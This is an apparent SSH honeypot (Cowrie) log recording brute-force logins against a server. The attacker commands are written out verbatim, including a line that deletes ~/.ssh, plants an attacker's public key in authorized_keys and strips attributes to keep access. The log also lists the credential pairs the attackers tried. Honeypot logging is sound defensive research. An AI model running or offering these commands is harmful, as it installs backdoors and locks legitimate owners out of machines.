AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:02:00.058062Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:02:00.170178Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:00.171110Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":41614,"dst_ip":"1.2.3.4","dst_port":22,"session":"328cedc94d56","protocol":"ssh","message":"New connection: 192.210.135.20:41614 (1.2.3.4:22) [session: 328cedc94d56]","sensor":"my-vps","timestamp":"2025-09-09T04:02:00.288114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:00.288925Z","src_ip":"192.210.135.20","session":"328cedc94d56"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:02:00.408108Z","src_ip":"192.210.135.20","session":"328cedc94d56"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:02:00.925522Z","src_ip":"192.210.135.20","session":"328cedc94d56"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":57504,"dst_ip":"1.2.3.4","dst_port":22,"session":"b62bd866dfdb","protocol":"ssh","message":"New connection: 152.32.190.168:57504 (1.2.3.4:22) [session: b62bd866dfdb]","sensor":"my-vps","timestamp":"2025-09-09T04:02:01.144769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:01.145680Z","src_ip":"152.32.190.168","session":"b62bd866dfdb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:02:01.340159Z","src_ip":"152.32.190.168","session":"b62bd866dfdb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:02.045915Z","src_ip":"192.210.135.20","session":"328cedc94d56"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":42014,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d35fcf9d72a","protocol":"ssh","message":"New connection: 192.210.135.20:42014 (1.2.3.4:22) [session: 8d35fcf9d72a]","sensor":"my-vps","timestamp":"2025-09-09T04:02:02.154031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:02.155470Z","src_ip":"192.210.135.20","session":"8d35fcf9d72a"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T04:02:02.158976Z","src_ip":"152.32.190.168","session":"b62bd866dfdb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:02:02.264412Z","src_ip":"192.210.135.20","session":"8d35fcf9d72a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:02:02.742399Z","src_ip":"192.210.135.20","session":"8d35fcf9d72a"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:02.852906Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:02.853892Z","src_ip":"192.210.135.20","session":"8d35fcf9d72a"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:03.359304Z","src_ip":"152.32.190.168","session":"b62bd866dfdb"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:09.729162Z","src_ip":"111.180.193.159","session":"e8b5dce21ab6"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":59281,"dst_ip":"1.2.3.4","dst_port":22,"session":"174631452128","protocol":"ssh","message":"New connection: 154.209.4.55:59281 (1.2.3.4:22) [session: 174631452128]","sensor":"my-vps","timestamp":"2025-09-09T04:02:32.025977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:32.034323Z","src_ip":"154.209.4.55","session":"174631452128"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:02:32.234839Z","src_ip":"154.209.4.55","session":"174631452128"}
{"eventid":"cowrie.login.failed","username":"access","password":"111","message":"login attempt [access/111] failed","sensor":"my-vps","timestamp":"2025-09-09T04:02:33.046550Z","src_ip":"154.209.4.55","session":"174631452128"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:34.260628Z","src_ip":"154.209.4.55","session":"174631452128"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":57602,"dst_ip":"1.2.3.4","dst_port":22,"session":"c26a1a04686c","protocol":"ssh","message":"New connection: 51.81.118.153:57602 (1.2.3.4:22) [session: c26a1a04686c]","sensor":"my-vps","timestamp":"2025-09-09T04:02:46.003750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:46.005318Z","src_ip":"51.81.118.153","session":"c26a1a04686c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:02:46.100968Z","src_ip":"51.81.118.153","session":"c26a1a04686c"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"qwerty","message":"login attempt [raspberry/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T04:02:46.523380Z","src_ip":"51.81.118.153","session":"c26a1a04686c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:47.621459Z","src_ip":"51.81.118.153","session":"c26a1a04686c"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":35052,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9737aa65919","protocol":"ssh","message":"New connection: 102.68.86.62:35052 (1.2.3.4:22) [session: d9737aa65919]","sensor":"my-vps","timestamp":"2025-09-09T04:02:48.688632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:48.689555Z","src_ip":"102.68.86.62","session":"d9737aa65919"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:02:48.859477Z","src_ip":"102.68.86.62","session":"d9737aa65919"}
{"eventid":"cowrie.login.failed","username":"private","password":"0","message":"login attempt [private/0] failed","sensor":"my-vps","timestamp":"2025-09-09T04:02:49.582255Z","src_ip":"102.68.86.62","session":"d9737aa65919"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:50.754626Z","src_ip":"102.68.86.62","session":"d9737aa65919"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":46338,"dst_ip":"1.2.3.4","dst_port":22,"session":"4765e3ea9f31","protocol":"ssh","message":"New connection: 211.22.25.164:46338 (1.2.3.4:22) [session: 4765e3ea9f31]","sensor":"my-vps","timestamp":"2025-09-09T04:02:52.869733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:52.871060Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:02:53.110748Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.login.success","username":"root","password":"P4$$W0rd","message":"login attempt [root/P4$$W0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:02:54.112865Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:02:54.653448Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:02:54.654252Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:02:54.655782Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:54.898864Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:02:55.399283Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:02:55.399956Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:02:55.641878Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:55.642737Z","src_ip":"211.22.25.164","session":"4765e3ea9f31"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":50926,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed9fa05c4812","protocol":"ssh","message":"New connection: 211.22.25.164:50926 (1.2.3.4:22) [session: ed9fa05c4812]","sensor":"my-vps","timestamp":"2025-09-09T04:02:55.880718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:02:55.881344Z","src_ip":"211.22.25.164","session":"ed9fa05c4812"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:02:56.121932Z","src_ip":"211.22.25.164","session":"ed9fa05c4812"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:02:57.127438Z","src_ip":"211.22.25.164","session":"ed9fa05c4812"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:02:58.370148Z","src_ip":"211.22.25.164","session":"ed9fa05c4812"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":36576,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d0f2a1783d3","protocol":"ssh","message":"New connection: 211.22.25.164:36576 (1.2.3.4:22) [session: 1d0f2a1783d3]","sensor":"my-vps","timestamp":"2025-09-09T04:02:58.608692Z"}
